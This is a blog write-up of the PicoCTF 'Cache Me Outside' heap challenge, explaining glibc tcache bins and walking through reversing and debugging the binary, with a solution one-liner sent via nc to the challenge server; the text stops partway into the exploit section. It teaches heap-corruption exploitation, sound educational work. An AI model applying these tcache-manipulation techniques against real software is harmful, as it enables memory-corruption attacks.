featureenvy

The blog of a thinkerer.
By @featureenvy

All rights reserved.

An Introduction To Tcache Heap Exploits

Heap exploits have always been a mystery to me. I am generally not that experienced with binary exploitation, so when a heap exploit came up on the recent PicoCTF competition I decided this is a good moment to take a closer look at heap exploits. This took me down, well, I can’t really call it a rabbit hole. It felt more like falling into a huge sinkhole.

So I guess this is my addition to the heap of failed attempts at explaining how head exploitation works.

Challenge

The challenge was:

Cache Me Outside

While being super relevant with my meme references, I wrote a program to see how much you understand heap allocations. nc mercury.picoctf.net 31153

It came with three files: A binary, a makefile, as well as a libc file. Additionally, there was a hint that points to glibc’s tcache.

TLDR

The solution is:

$ echo "-5144\n\x00\n\n" |  nc mercury.picoctf.net 31153

Input one has to be -5144, input two \x00. Yes, I need thousands of words to explain how I derived two simple inputs. I said heap exploitation is convoluted.

Exploring The Binary

First things first, let’s run the binary on the remote server:

$ nc mercury.picoctf.net 31153  
You may edit one byte in the program.
Address: AAAAA
Value: t help you: this is a random string.

It allows me to enter an address (here I used AAAAA) and then returns what seems like a partial string (t help you: this is a random string.)

Prepare The Local Binary

A good start is always strings.

$ strings heapedit  

[...snip...]   

this is H
a randomH
 string.H
CongratsH
! Your fH
lag is: H
Sorry! TH
his won'H
t help yH

[...snip...]

It does return a few string fragments (this is H, ag is: H, Sorry! TH, etc). Otherwise it does not return too much of interest.

Since that didn’t help, run the binary: If you are running a virus now, well… Sorry!

$ ./heapedit     
zsh: segmentation fault  ./heapedit

That does not work, because the libc version of the binary does not agree with the libc version of the system.

$ ./libc.so.6 # libc of the challenge
GNU C Library (Ubuntu GLIBC 2.27-3ubuntu1.2) stable release version 2.27.
$ ldd --version # libc of my system
ldd (Debian GLIBC 2.31-9) 2.31

The binary was compiled against 2.27, but locally, I have 2.31 (from ldd). This is most likely why it won’t run. One way to fix it (sometimes, at least), is to use pwninit. It will download a dynamic linker compatible with the expected libc version. Then we can run the tool against this libc library instead of the system library. Putting the executable as well as libc.so.6 in the same folder, then running pwninit.

$ pwninit
bin: ./heapedit
libc: ./libc.so.6

fetching linker
setting ./ld-2.27.so executable

This downloads a linker compatible with the libc version of the binary. Now we can run the binary by overwriting the library load path with LD_PRELOAD.

$ LD_PREALOAD=./libc.so.6 ./ld-2.27.so ./heapedit
zsh: segmentation fault  LD_PREALOAD=./libc.so.6 ./ld-2.27.so ./heapedit

It still crashes! To figure out why, we need to be able to run it, to debug it. But working with binaries that need to have LD_PRELOAD set is a bit cumbersome. For example, I would love to just run ltrace on it to get an idea what is happening. With LD_PRELOAD set, this won’t work, as then ltrace would also be run with a different libc, which, in turn, does not work. Welcome, cyclic dependency hell! However, we can just rewrite the interpreter in the binary. First, let’s check the libc it points right now:

$ file heapedit
heapedit_orig: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=6967c296c25feb50c480b4edb5c56c234bb30392, not stripped

It points to /lib64/ld-linux-x86-64.so.2. We can rewrite it with patchelf:

$ patchelf  --set-interpreter ./ld-2.27.so ./heapedit

$ file ./heapedit   
./heapedit: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter ./ld-2.27.so, for GNU/Linux 3.2.0, BuildID[sha1]=6967c296c25feb50c480b4edb5c56c234bb30392, not stripped

Now we can run heapedit without LD_PRELOAD.

$ ./heapedit
zsh: segmentation fault  ./heapedit

But we still get a segfault! At least now we can run other tools against the binary. For example, ltrace. ltrace, Library Trace, will trace all dynamic library calls. This, together with the similar strace, that tracks system calls, is a very easy way to see roughly what an executable does.

$ ltrace ./heapedit
setbuf(0x7fcf63e56760, 0)          = <void>
fopen("flag.txt", "r")             = 0
fgets( <no return ...>
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++

ltrace shows that it calls fopen to open a file called flag.txt, calls fgets — most likely with the file handle from fopen — and segfaults. It is probably safe to assume that the flag.txt is required to run heapedit. Luckily, there is an easy fix for that.

$ echo "iamaflag" > flag.txt                                             

$ ./heapedit 
You may edit one byte in the program.
Address: AAAA
Value: t help you: this is a random string.

Perfect! The binary finally runs locally. (Thanks to this writeup for the hints on how to get the file running without changing to a completely new VM with the same libc version.)

But, we still are nowhere near to actually solving the challenge. Let’s open the binary in ghidra to see what is actually happening.

Reversing The Binary

Importing the binary into ghidra, running all analyzers and then searching for main gives the following decompiled output: PSA: Newer trust the decompiler, dummy!

(Note you can change between the raw output of ghidra and the slightly cleaned up version at the top of the code listing by clicking on “ghidra” and “cleaned”.)

undefined8 main(void)
{
  long in_FS_OFFSET;
  undefined local_a9;
  int local_a8;
  int local_a4;
  undefined8 *local_a0;
  undefined8 *local_98;
  FILE *local_90;
  undefined8 *local_88;
  void *local_80;
  undefined8 local_78;
  undefined8 local_70;
  undefined8 local_68;
  undefined local_60;
  char local_58 [72];
  long local_10;

  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  setbuf(stdout,(char *)0x0);
  local_90 = fopen("flag.txt","r"); // (1)
  fgets(local_58,0x40,local_90);
  local_78 = 0x2073692073696874; // (2)
  local_70 = 0x6d6f646e61722061;
  local_68 = 0x2e676e6972747320;
  local_60 = 0;
  local_a0 = (undefined8 *)0x0;
  local_a4 = 0;
  while (local_a4 < 7) { // (3)
    local_98 = (undefined8 *)malloc(0x80);
    if (local_a0 == (undefined8 *)0x0) {
      local_a0 = local_98; // (4)
    }
    *local_98 = 0x73746172676e6f43; // (5)
    local_98[1] = 0x662072756f592021;
    local_98[2] = 0x203a73692067616c;
    *(undefined *)(local_98 + 3) = 0;
    strcat((char *)local_98,local_58); // (6)
    local_a4 = local_a4 + 1;
  }
  local_88 = (undefined8 *)malloc(0x80); // (7)
  *local_88 = 0x5420217972726f53;
  local_88[1] = 0x276e6f7720736968;
  local_88[2] = 0x7920706c65682074;
  *(undefined4 *)(local_88 + 3) = 0x203a756f;
  *(undefined *)((long)local_88 + 0x1c) = 0;
  strcat((char *)local_88,(char *)&local_78); // (8)
  free(local_98); // (9)
  free(local_88);
  local_a8 = 0;
  local_a9 = 0;
  puts("You may edit one byte in the program.");
  printf("Address: ");
  __isoc99_scanf(&DAT_00400b48,&local_a8); // (10)
  printf("Value: ");
  __isoc99_scanf(&DAT_00400b53,&local_a9); // (11)
  *(undefined *)((long)local_a8 + (long)local_a0) = local_a9;
  local_80 = malloc(0x80); // (12)
  puts((char *)((long)local_80 + 0x10)); // (13)
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return 0;
}
undefined8 main(void)

{
  long in_FS_OFFSET;
  char new_byte;
  int address;
  int iStack164;
  undefined *first_malloc_data;
  char **flag_data;
  FILE *flag_file_ptr;
  char **random_data;
  char **last_malloc;
  char random_string [24];
  char flag_ptr [72];
  long local_10;

  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  setbuf(stdout,(char *)0x0);
  flag_file_ptr = fopen("flag.txt","r"); // (1)
  fgets(flag_ptr,0x40,flag_file_ptr);
  random_string._0_8_ = 2338328219631577204; // (2)
  random_string._8_8_ = 7885631897793077345;
  random_string._16_8_ = 3343762647516738336;
  first_malloc_data = (undefined *)0x0;
  i = 0;
  while (i < 7) { // (3)
    flag_data = (char **)malloc(0x80);
    if (first_malloc_data == (undefined *)0x0) {
      first_malloc_data = (undefined *)flag_data; // (4)
    }
    *flag_data = (char *)8319381555649605443; // (5)
    flag_data[1] = (char *)7359007639828242465;
    flag_data[2] = (char *)2322295453215318380;
    *(undefined *)(flag_data + 3) = 0;
    strcat((char *)flag_data,flag_ptr); // (6)
    i = i + 1;
  }
  random_data = (char **)malloc(0x80); // (7)
  *random_data = (char *)6061881903935549267;
  random_data[1] = (char *)2841330972353587560;
  random_data[2] = (char *)8728099688704122996;
  *(undefined4 *)(random_data + 3) = 540702063;
  *(undefined *)((long)random_data + 0x1c) = 0;
  strcat((char *)random_data,random_string); // (8)
  free(flag_data); // (9)
  free(random_data);
  address = 0;
  new_byte = '\0';
  puts("You may edit one byte in the program.");
  printf("Address: ");
  __isoc99_scanf("%d",&address); // (10)
  printf("Value: ");
  __isoc99_scanf(" %c",&new_byte); // (11)
  first_malloc_data[address] = new_byte;
  last_malloc = (char **)malloc(0x80); // (12)
  puts((char *)(last_malloc + 2));
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return 0;
}

The code first loads a file called flag.txt (1) and stores it in the stack variable flag_ptr. Then it prepares a char array (2) with the string “This is a random string.”. It then starts a loop (3) that will allocate 7 chunks of 0x80 in size. The chunks will contain a string (5) “Congrats! Your flag is: “ and the flag (6). It also stores the first chunk in a separate stack variable first_malloc_data (4). Note that the flag_data pointer is overwritten in each iteration of the loop without freeing the allocated chunk first. This is a classic memory leak.

After the loop it allocates the random_data chunk of size 0x80 (7) and adds the string “Sorry, this will not help you: “ and a random string (8). Afterwards, it frees first_malloc_data containing the flag (9), then frees random_data. It reads an address from standard input (10) as well as a new byte (11) and writes the new byte to first_malloc_data[address]. It allocates one last chunk last_malloc of size 0x80 (12) and prints that chunk as a string (minus the first few bytes). Afterwards it exits.

The bug (or, well, feature) of the code is that we can write one byte anywhere in memory, relative to an address in the heap. The second problem is that the last_malloc chunk gets allocated in (12) and then printed, without zeroing or changing the data. From the output from the program we know that thelast_malloc chunk is the same as the last freed chunk random_data, as it prints the same text as put into random_data in (7).

If we just could get the allocator to return us the chunk with the flag… But, can we? Yes, we can. But this will now require a bit of knowledge about how the heap works.

The Heap Explained

When running a process, there are different ways to store data in memory. Generally, there is the stack and the heap.

Theoretically, there is a third way, what I like to call the “anywhere in process memory”. There is nothing limiting us from just placing some data at address 0x7f88443322110044, as long as that address is memory mapped. I would not recommend that, however.

A memory map can be dumped with gdb:

gef➤  info proc mappings
process 1203
Mapped address spaces:

          Start Addr           End Addr       Size     Offset objfile
            0x400000           0x401000     0x1000        0x0 /home/picoctf/cache-me-outside/heapedit
            0x600000           0x601000     0x1000        0x0 /home/picoctf/cache-me-outside/heapedit
            0x601000           0x602000     0x1000     0x1000 /home/picoctf/cache-me-outside/heapedit
            0x602000           0x623000    0x21000        0x0 [heap]
      0x7ffff7ded000     0x7ffff7e12000    0x25000        0x0 /usr/lib/x86_64-linux-gnu/libc-2.31.so
      0x7ffff7e12000     0x7ffff7f5d000   0x14b000    0x25000 /usr/lib/x86_64-linux-gnu/libc-2.31.so
      0x7ffff7f5d000     0x7ffff7fa7000    0x4a000   0x170000 /usr/lib/x86_64-linux-gnu/libc-2.31.so
      0x7ffff7fa7000     0x7ffff7fa8000     0x1000   0x1ba000 /usr/lib/x86_64-linux-gnu/libc-2.31.so
      0x7ffff7fa8000     0x7ffff7fab000     0x3000   0x1ba000 /usr/lib/x86_64-linux-gnu/libc-2.31.so
      0x7ffff7fab000     0x7ffff7fae000     0x3000   0x1bd000 /usr/lib/x86_64-linux-gnu/libc-2.31.so
      0x7ffff7fae000     0x7ffff7fb4000     0x6000        0x0 
      0x7ffff7fcc000     0x7ffff7fd0000     0x4000        0x0 [vvar]
      0x7ffff7fd0000     0x7ffff7fd2000     0x2000        0x0 [vdso]
      0x7ffff7fd2000     0x7ffff7fd3000     0x1000        0x0 /usr/lib/x86_64-linux-gnu/ld-2.31.so
      0x7ffff7fd3000     0x7ffff7ff3000    0x20000     0x1000 /usr/lib/x86_64-linux-gnu/ld-2.31.so
      0x7ffff7ff3000     0x7ffff7ffb000     0x8000    0x21000 /usr/lib/x86_64-linux-gnu/ld-2.31.so
      0x7ffff7ffc000     0x7ffff7ffd000     0x1000    0x29000 /usr/lib/x86_64-linux-gnu/ld-2.31.so
      0x7ffff7ffd000     0x7ffff7ffe000     0x1000    0x2a000 /usr/lib/x86_64-linux-gnu/ld-2.31.so
      0x7ffff7ffe000     0x7ffff7fff000     0x1000        0x0 
      0x7ffffffde000     0x7ffffffff000    0x21000        0x0 [stack]

Here we can see that the [stack] is mapped from 0x7ffffffde000 to 0x7ffffffff000 and the heap from 0x602000 to 0x623000. You can also find this information for a running process without GDB. Exit gdb and run vuln again. Then, in a new terminal, get the memory map directly from the file system (1223 is the PID of vuln):

$ cat /proc/1223/maps 
00400000-00401000 r-xp 00000000 00:2a 2858                               /home/picoctf/cache-me-outside/heapedit
00600000-00601000 r--p 00000000 00:2a 2858                               /home/picoctf/cache-me-outside/heapedit
00601000-00602000 rw-p 00001000 00:2a 2858                               /home/picoctf/cache-me-outside/heapedit
00a8a000-00aab000 rw-p 00000000 00:00 0                                  [heap]
7fa50edde000-7fa50ee03000 r--p 00000000 08:01 4458632                    /usr/lib/x86_64-linux-gnu/libc-2.31.so
7fa50ee03000-7fa50ef4e000 r-xp 00025000 08:01 4458632                    /usr/lib/x86_64-linux-gnu/libc-2.31.so
7fa50ef4e000-7fa50ef98000 r--p 00170000 08:01 4458632                    /usr/lib/x86_64-linux-gnu/libc-2.31.so
7fa50ef98000-7fa50ef99000 ---p 001ba000 08:01 4458632                    /usr/lib/x86_64-linux-gnu/libc-2.31.so
7fa50ef99000-7fa50ef9c000 r--p 001ba000 08:01 4458632                    /usr/lib/x86_64-linux-gnu/libc-2.31.so
7fa50ef9c000-7fa50ef9f000 rw-p 001bd000 08:01 4458632                    /usr/lib/x86_64-linux-gnu/libc-2.31.so
7fa50ef9f000-7fa50efa5000 rw-p 00000000 00:00 0 
7fa50efbd000-7fa50efbe000 r--p 00000000 08:01 4458628                    /usr/lib/x86_64-linux-gnu/ld-2.31.so
7fa50efbe000-7fa50efde000 r-xp 00001000 08:01 4458628                    /usr/lib/x86_64-linux-gnu/ld-2.31.so
7fa50efde000-7fa50efe6000 r--p 00021000 08:01 4458628                    /usr/lib/x86_64-linux-gnu/ld-2.31.so
7fa50efe7000-7fa50efe8000 r--p 00029000 08:01 4458628                    /usr/lib/x86_64-linux-gnu/ld-2.31.so
7fa50efe8000-7fa50efe9000 rw-p 0002a000 08:01 4458628                    /usr/lib/x86_64-linux-gnu/ld-2.31.so
7fa50efe9000-7fa50efea000 rw-p 00000000 00:00 0 
7fff22800000-7fff22821000 rw-p 00000000 00:00 0                          [stack]
7fff22920000-7fff22924000 r--p 00000000 00:00 0                          [vvar]
7fff22924000-7fff22926000 r-xp 00000000 00:00 0                          [vdso]

The [heap] is mapped from 0x00a8a000 to 0x00aab000. Wasn’t it different before? Yes. This is because ASLR (Address Space Layout Randomization) is enabled on my system. Every time a process starts, the position of the heap and stack will be randomized.

The stack is used automatically by the compiler for parameters and local variables . Usually, you do not have know about that at all, except when writing assembly directly. But it can only store data with predetermined sizes at compile time. If you need variable sized data, you need a heap.

The heap is a separate memory region that is used by the allocator to allocate variable sized data — a string entered by the user, a package received from the network — aka chunks. The management of the heap is quite complicated, as it needs to be as fast as possible. Run an executable in gdb, set a breakpoint on malloc and, well, your process will be paused. A lot!

The high performance is achieved by using different techniques. When allocation a chunk of memory with malloc or freeing it with free, the allocator is called. It will reserve some memory in the [heap] and return a pointer to this address. It will also mark this chunk as used. When the chunk is no longer required by the program, the program calls free on that chunk.You do call free on all your mallocs. Right? Right??? The allocator will then put that chunk into the pool of free resources. Note that the allocator is not a hard coded dependency and can be changed. For Linux programs, the glibc allocator is most often used.

How does the allocator manage these chunks? Now, here is where it gets complicated. To speed up the process of allocating new memory, the allocator does not always search through all of the heap memory to find a free space. Instead, it tries to reuse as many chunks as possible. Many programs tend to allocate and free many chunks of similar sizes in rapid succession, for example when allocating a new integer in each iteration of a loop. Hence the allocator puts freed chunks into so called bins (think recycling bins) for easy retrieval in case a similar sized chunk is requested immediately again.

The glibc allocator keeps many different bins of different shapes and sizes for performance optimizations. It has a number of small bins, large bins, unsorted bins, fast bins and tcache bins. Yes, it only took me, like, 2000 words to finally get to the tcache! I will not go into detail here about all the different bins and strategies. If you are interested, I highly recommend the blog series “Understanding the Glibc Heap Implementation” by Azeria. Most of my understanding comes from these blog posts!

The interesting thing to note for this exploit is that when a chunk is freed, it is added to the tcache. The tcache is the “thread cache” where freed chunks go to be recycled if used again by the same thread. At least, at first, and only seven times, and only if it has the same size, but let’s not get into too much detail. For this exploit, it is true, it will be added to a tcache list of memory chunks that will be reused by the allocator. This is why, at the end of the program, we get the last freed chunk back.

The following animation shows how elements are added and removed from the tcache.

// Program Start




                     
                    ◄─── tcache bin
                        
// Program Start
free(flag_data);



┌──────────────────┐    
│    flag_data     │◄─── tcache bin
└──────────────────┘    
// Program Start
free(flag_data);
free(random_data);


┌──────────────────┐
│    flag_data     │
└──────────────────┘
         ▲
         │
┌────────┴─────────┐    
│   random_data    │◄─── tcache bin
└──────────────────┘    
// Program Start
free(flag_data);
free(random_data);
last_malloc = malloc(0x80);

┌──────────────────┐   
│    flag_data     │◄─── tcache bin
└──────────────────┘   


┌──────────────────┐    
│   random_data    │◄─── last_malloc 
└──────────────────┘    

The animation shows the tcache from the program start and after each free. The first 7 mallocs from the loop are not visible in the tcache, as all of these allocations are new allocations and are not in a recycling bin yet. You do not buy bottles just to put them into a recycling bin, do you. Then the two frees are put in the tcache. The tcache bin pointer always points to the last freed chunk. The last malloc does not allocate a new chunk, but will instead reuse the random_data chunk from the tcache bin. The tcache bin pointer then points to flag_data, as this is now the next free chunk in the tcache.

Another way to take a look at the tcache is to use gef to dump information about the heap. Let’s start the program again with gdb and look at the tcache.

gef➤  heap bin tcache
──────── Tcachebins for arena 0x7ffff7dcfc40 ──────

At the start it is, unsurprisingly, empty. Let’s set two breakpoints just after the calls to free so we can inspect the tcache. First, disassemble main in gdb:

gef➤  disas main
Dump of assembler code for function main:
   0x0000000000400807 <+0>:     push   rbp
   0x0000000000400808 <+1>:     mov    rbp,rsp
   0x000000000040080b <+4>:     sub    rsp,0xc0
   0x0000000000400812 <+11>:    mov    DWORD PTR [rbp-0xb4],edi
   0x0000000000400818 <+17>:    mov    QWORD PTR [rbp-0xc0],rsi
   0x000000000040081f <+24>:    mov    rax,QWORD PTR fs:0x28
   0x0000000000400828 <+33>:    mov    QWORD PTR [rbp-0x8],rax
   0x000000000040082c <+37>:    xor    eax,eax
   0x000000000040082e <+39>:    mov    rax,QWORD PTR [rip+0x200843]        # 0x601078 <stdout@@GLIBC_2.2.5>
   0x0000000000400835 <+46>:    mov    esi,0x0
   0x000000000040083a <+51>:    mov    rdi,rax
   0x000000000040083d <+54>:    call   0x4006b0 <setbuf@plt>
   0x0000000000400842 <+59>:    lea    rsi,[rip+0x2bf]        # 0x400b08
   0x0000000000400849 <+66>:    lea    rdi,[rip+0x2ba]        # 0x400b0a
   0x0000000000400850 <+73>:    call   0x4006f0 <fopen@plt>
   0x0000000000400855 <+78>:    mov    QWORD PTR [rbp-0x88],rax
   0x000000000040085c <+85>:    mov    rdx,QWORD PTR [rbp-0x88]
   0x0000000000400863 <+92>:    lea    rax,[rbp-0x50]
   0x0000000000400867 <+96>:    mov    esi,0x40
   0x000000000040086c <+101>:   mov    rdi,rax
   0x000000000040086f <+104>:   call   0x4006d0 <fgets@plt>
   0x0000000000400874 <+109>:   movabs rax,0x2073692073696874
   0x000000000040087e <+119>:   movabs rdx,0x6d6f646e61722061
   0x0000000000400888 <+129>:   mov    QWORD PTR [rbp-0x70],rax
   0x000000000040088c <+133>:   mov    QWORD PTR [rbp-0x68],rdx
   0x0000000000400890 <+137>:   movabs rax,0x2e676e6972747320
   0x000000000040089a <+147>:   mov    QWORD PTR [rbp-0x60],rax
   0x000000000040089e <+151>:   mov    BYTE PTR [rbp-0x58],0x0
   0x00000000004008a2 <+155>:   mov    QWORD PTR [rbp-0x98],0x0
   0x00000000004008ad <+166>:   mov    DWORD PTR [rbp-0x9c],0x0
   0x00000000004008b7 <+176>:   jmp    0x400933 <main+300>
   0x00000000004008b9 <+178>:   mov    edi,0x80
   0x00000000004008be <+183>:   call   0x4006e0 <malloc@plt>
   0x00000000004008c3 <+188>:   mov    QWORD PTR [rbp-0x90],rax
   0x00000000004008ca <+195>:   cmp    QWORD PTR [rbp-0x98],0x0
   0x00000000004008d2 <+203>:   jne    0x4008e2 <main+219>
   0x00000000004008d4 <+205>:   mov    rax,QWORD PTR [rbp-0x90]
   0x00000000004008db <+212>:   mov    QWORD PTR [rbp-0x98],rax
   0x00000000004008e2 <+219>:   mov    rax,QWORD PTR [rbp-0x90]
   0x00000000004008e9 <+226>:   movabs rsi,0x73746172676e6f43
   0x00000000004008f3 <+236>:   movabs rdi,0x662072756f592021
   0x00000000004008fd <+246>:   mov    QWORD PTR [rax],rsi
   0x0000000000400900 <+249>:   mov    QWORD PTR [rax+0x8],rdi
   0x0000000000400904 <+253>:   movabs rcx,0x203a73692067616c
   0x000000000040090e <+263>:   mov    QWORD PTR [rax+0x10],rcx
   0x0000000000400912 <+267>:   mov    BYTE PTR [rax+0x18],0x0
   0x0000000000400916 <+271>:   lea    rdx,[rbp-0x50]
   0x000000000040091a <+275>:   mov    rax,QWORD PTR [rbp-0x90]
   0x0000000000400921 <+282>:   mov    rsi,rdx
   0x0000000000400924 <+285>:   mov    rdi,rax
   0x0000000000400927 <+288>:   call   0x400710 <strcat@plt>
   0x000000000040092c <+293>:   add    DWORD PTR [rbp-0x9c],0x1
   0x0000000000400933 <+300>:   cmp    DWORD PTR [rbp-0x9c],0x6
   0x000000000040093a <+307>:   jle    0x4008b9 <main+178>
   0x0000000000400940 <+313>:   mov    edi,0x80
   0x0000000000400945 <+318>:   call   0x4006e0 <malloc@plt>
   0x000000000040094a <+323>:   mov    QWORD PTR [rbp-0x80],rax
   0x000000000040094e <+327>:   mov    rax,QWORD PTR [rbp-0x80]
   0x0000000000400952 <+331>:   movabs rsi,0x5420217972726f53
   0x000000000040095c <+341>:   movabs rdi,0x276e6f7720736968
   0x0000000000400966 <+351>:   mov    QWORD PTR [rax],rsi
   0x0000000000400969 <+354>:   mov    QWORD PTR [rax+0x8],rdi
   0x000000000040096d <+358>:   movabs rcx,0x7920706c65682074
   0x0000000000400977 <+368>:   mov    QWORD PTR [rax+0x10],rcx
   0x000000000040097b <+372>:   mov    DWORD PTR [rax+0x18],0x203a756f
   0x0000000000400982 <+379>:   mov    BYTE PTR [rax+0x1c],0x0
   0x0000000000400986 <+383>:   lea    rdx,[rbp-0x70]
   0x000000000040098a <+387>:   mov    rax,QWORD PTR [rbp-0x80]
   0x000000000040098e <+391>:   mov    rsi,rdx
   0x0000000000400991 <+394>:   mov    rdi,rax
   0x0000000000400994 <+397>:   call   0x400710 <strcat@plt>
   0x0000000000400999 <+402>:   mov    rax,QWORD PTR [rbp-0x90]
   0x00000000004009a0 <+409>:   mov    rdi,rax
   0x00000000004009a3 <+412>:   call   0x400680 <free@plt>
   0x00000000004009a8 <+417>:   mov    rax,QWORD PTR [rbp-0x80]
   0x00000000004009ac <+421>:   mov    rdi,rax
   0x00000000004009af <+424>:   call   0x400680 <free@plt>
   0x00000000004009b4 <+429>:   mov    DWORD PTR [rbp-0xa0],0x0
   0x00000000004009be <+439>:   mov    BYTE PTR [rbp-0xa1],0x0
   0x00000000004009c5 <+446>:   lea    rdi,[rip+0x14c]        # 0x400b18
   0x00000000004009cc <+453>:   call   0x400690 <puts@plt>
   0x00000000004009d1 <+458>:   lea    rdi,[rip+0x166]        # 0x400b3e
   0x00000000004009d8 <+465>:   mov    eax,0x0
   0x00000000004009dd <+470>:   call   0x4006c0 <printf@plt>
   0x00000000004009e2 <+475>:   lea    rax,[rbp-0xa0]
   0x00000000004009e9 <+482>:   mov    rsi,rax
   0x00000000004009ec <+485>:   lea    rdi,[rip+0x155]        # 0x400b48
   0x00000000004009f3 <+492>:   mov    eax,0x0
   0x00000000004009f8 <+497>:   call   0x400700 <__isoc99_scanf@plt>
   0x00000000004009fd <+502>:   lea    rdi,[rip+0x147]        # 0x400b4b
   0x0000000000400a04 <+509>:   mov    eax,0x0
   0x0000000000400a09 <+514>:   call   0x4006c0 <printf@plt>
   0x0000000000400a0e <+519>:   lea    rax,[rbp-0xa1]
   0x0000000000400a15 <+526>:   mov    rsi,rax
   0x0000000000400a18 <+529>:   lea    rdi,[rip+0x134]        # 0x400b53
   0x0000000000400a1f <+536>:   mov    eax,0x0
   0x0000000000400a24 <+541>:   call   0x400700 <__isoc99_scanf@plt>
   0x0000000000400a29 <+546>:   mov    eax,DWORD PTR [rbp-0xa0]
   0x0000000000400a2f <+552>:   movsxd rdx,eax
   0x0000000000400a32 <+555>:   mov    rax,QWORD PTR [rbp-0x98]
   0x0000000000400a39 <+562>:   add    rdx,rax
   0x0000000000400a3c <+565>:   movzx  eax,BYTE PTR [rbp-0xa1]
   0x0000000000400a43 <+572>:   mov    BYTE PTR [rdx],al
   0x0000000000400a45 <+574>:   mov    edi,0x80
   0x0000000000400a4a <+579>:   call   0x4006e0 <malloc@plt>
   0x0000000000400a4f <+584>:   mov    QWORD PTR [rbp-0x78],rax
   0x0000000000400a53 <+588>:   mov    rax,QWORD PTR [rbp-0x78]
   0x0000000000400a57 <+592>:   add    rax,0x10
   0x0000000000400a5b <+596>:   mov    rdi,rax
   0x0000000000400a5e <+599>:   call   0x400690 <puts@plt>
   0x0000000000400a63 <+604>:   mov    eax,0x0
   0x0000000000400a68 <+609>:   mov    rcx,QWORD PTR [rbp-0x8]
   0x0000000000400a6c <+613>:   xor    rcx,QWORD PTR fs:0x28
   0x0000000000400a75 <+622>:   je     0x400a7c <main+629>
   0x0000000000400a77 <+624>:   call   0x4006a0 <__stack_chk_fail@plt>
   0x0000000000400a7c <+629>:   leave  
   0x0000000000400a7d <+630>:   ret    

Then set two breakpoints just after the two free calls and continue the debugger.

gef➤  b *main+417
Breakpoint 4 at 0x4009a8
gef➤  b *main+429
Breakpoint 3 at 0x4009b4
gef➤  c

We can now inspect the tcache after the first free was hit.

gef➤  heap bin tcache
─────── Tcachebins for arena 0x7ffff7dcfc40 ───────
Tcachebins[idx=7, size=0x90] count=1  ←  Chunk(addr=0x603800, size=0x90, flags=PREV_INUSE)

There is one chunk at address 0x603800 in the tcache. Continue again so the second free is called and inspect the tcache.

gef➤  c
gef➤  heap bin tcache
─────── Tcachebins for arena 0x7ffff7dcfc40 ───────
Tcachebins[idx=7, size=0x90] count=2  ←  Chunk(addr=0x603890, size=0x90, flags=PREV_INUSE)  ←  Chunk(addr=0x603800, size=0x90, flags=PREV_INUSE) 

As expected, now there are two chunks in the tcache. The new at address 0x603890 and the chunk from before at 0x603800.

We can also inspect the two chunks:

gef➤  x/4xg 0x603800
0x603800:       0x0000000000000000      0x662072756f592021
0x603810:       0x203a73692067616c      0x67616c66616d6169
gef➤  x/4xg 0x603890
0x603890:       0x0000000000603800      0x276e6f7720736968
0x6038a0:       0x7920706c65682074      0x73696874203a756f

After the first 8 bytes the characters from the flag and the random string are still there. The first 8 bytes were overwritten by the allocator when the chunk was freed. The allocator will use it to store the pointer to the previous chunk in the tcache. The first chunk contains a null pointer, the second chunk a pointer to the first. We now know that the tcache is implemented as a stack.

If you do not have access to gef, the address can also be found via gdb. Let’s take a look at the relevant disassembly.

  0x00000000004009a8 <+417>:   mov    rax,QWORD PTR [rbp-0x80]
  0x00000000004009ac <+421>:   mov    rdi,rax
  0x00000000004009af <+424>:   call   0x400680 <free@plt>

The address to the last freed chunk is stored in rbp-0x80. So we can also get the address of the heap chunk via rbp-0x80.

gef➤  p *((void**)($rbp-0x80))
$8 = (void *) 0x603890

The Exploit

Now that we… umm… “understand” the tcache, we can finally talk about the exploit. The goal is for the malloc at the end to recycle the first_malloc_data instead of the random_data chunk. What we now know:

Everything seems to line up quiet well! Like someone planned this…

I will first exploit the binary locally with gdb, to ensure we really understand the challenge and can verify that it actually works. Afterwards I will generalize the exploit to make it runnable remotely.

Dry Run

First, we need to know the location of the tcache bin ptr (I will try to be consistent in using tcache bin pointer to denote where the tcache bin pointer is pointing to and tcache bin ptr to denote the location in memory of the tcache bin ptr itself). Logic dictates that the tcache bin ptr has to be somewhere in memory. Otherwise the allocator would not know where to insert the next element on a free or where to take a chunk from when malloc is called. It is also save to assume that the pointer has to be somewhere in the heap, as the allocator cannot rely on the stack for its pointers. Let’s search for it!

We continue with the gdb session started above, where the debugger is still waiting after the second free. First we need to know where the [heap] is in our process memory.

gef➤  info proc mappings
process 1343
Mapped address spaces:

          Start Addr           End Addr       Size     Offset objfile
            0x400000           0x401000     0x1000        0x0 /home/picoctf/cache-me-outside/heapedit
            0x600000           0x601000     0x1000        0x0 /home/picoctf/cache-me-outside/heapedit
            0x601000           0x602000     0x1000     0x1000 /home/picoctf/cache-me-outside/heapedit
            0x602000           0x623000    0x21000        0x0 [heap]
      0x7ffff79e4000     0x7ffff7bcb000   0x1e7000        0x0 /home/picoctf/cache-me-outside/libc.so.6
      0x7ffff7bcb000     0x7ffff7dcb000   0x200000   0x1e7000 /home/picoctf/cache-me-outside/libc.so.6
      0x7ffff7dcb000     0x7ffff7dcf000     0x4000   0x1e7000 /home/picoctf/cache-me-outside/libc.so.6
      0x7ffff7dcf000     0x7ffff7dd1000     0x2000   0x1eb000 /home/picoctf/cache-me-outside/libc.so.6
      0x7ffff7dd1000     0x7ffff7dd5000     0x4000        0x0 
      0x7ffff7dd5000     0x7ffff7dfc000    0x27000        0x0 /home/picoctf/cache-me-outside/ld-2.27.so
      0x7ffff7ff4000     0x7ffff7ff6000     0x2000        0x0 
      0x7ffff7ff6000     0x7ffff7ffa000     0x4000        0x0 [vvar]
      0x7ffff7ffa000     0x7ffff7ffc000     0x2000        0x0 [vdso]
      0x7ffff7ffc000     0x7ffff7ffd000     0x1000    0x27000 /home/picoctf/cache-me-outside/ld-2.27.so
      0x7ffff7ffd000     0x7ffff7ffe000     0x1000    0x28000 /home/picoctf/cache-me-outside/ld-2.27.so
